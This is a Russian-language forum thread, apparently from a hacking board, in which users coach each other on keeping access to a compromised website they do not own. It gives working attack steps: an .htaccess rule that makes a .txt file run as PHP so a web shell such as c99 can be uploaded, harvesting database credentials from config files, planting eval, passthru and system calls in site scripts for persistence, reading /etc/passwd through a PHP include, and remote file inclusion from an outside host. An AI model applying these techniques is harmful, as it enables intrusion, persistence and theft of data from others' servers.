шелл от madneta не помогает, он всё выполняет без ошибок, но лог так и остался.Может недостаточно прав??Я получил рута, создал нового user с привелегиями рута(как вооще его содать). Как теперь запустить шелл от user? Такое возможно?
собственно в этом то и проблема.Шелл с99 запускается из под www(user) который не обладает привилегиями рута.Как мне запустить с99 из под моего созданного пользователя??
как это от кого хочешь??!Ведь у бд есть только один user и passwd, они в конфиге в корне форума прописываются.Или я чего то не понимаю?
не понимаешь... К БД доступ может иметь N-ое кол-во акков) Если есть доступ к PHPMyAdmin, то через нее посмотри... Получить доступ к ней можно из данных таблицы mysql.user (не всегда )
Ураааааааа, я проник к нему и загрузил шелл, только файл шелла с расширение .php Как его текстового запускать? А можно при помощи шелла добавить нового пользователя в бд? Как вот лучше закрепиться на его акаунте?
Создаёшь файл '.htaccess' внутри него: Code: <Files "[B]text.txt[/B]"> AddType application/x-httpd-php .txt </Files> далее грузишь шелл с именем text.txt Ищи в шеле конфиги к базе данных внутри скриптов (логин;пароль;имя_базы) .. коннекться и создавай что за хочешь.. Редактируй скрипты.. вставляй в них инклуды .. eval-ы passthru , system .. etc
у меня такой вопрос, что полезного можно запустить или прочитать с помощью php-инклуда кроме /etc/passwd ? есть /etc/shadow но прав на чтение нету
1) Можешь найти ошибку и там будет путь: /home/host/site.ru/www/func/inc.php т.е. ты берешь путь home/host/site.ru/www/index.php и пробуешь прочитать файл. Если получится, то есть шанс найти конфиги коннекта к БД и подключиться! 2) Попробуй так: page.php?filename=http://shell.ru/shell.txt? - Почему .txt? Потому что веб сервер его интерпритирует как .php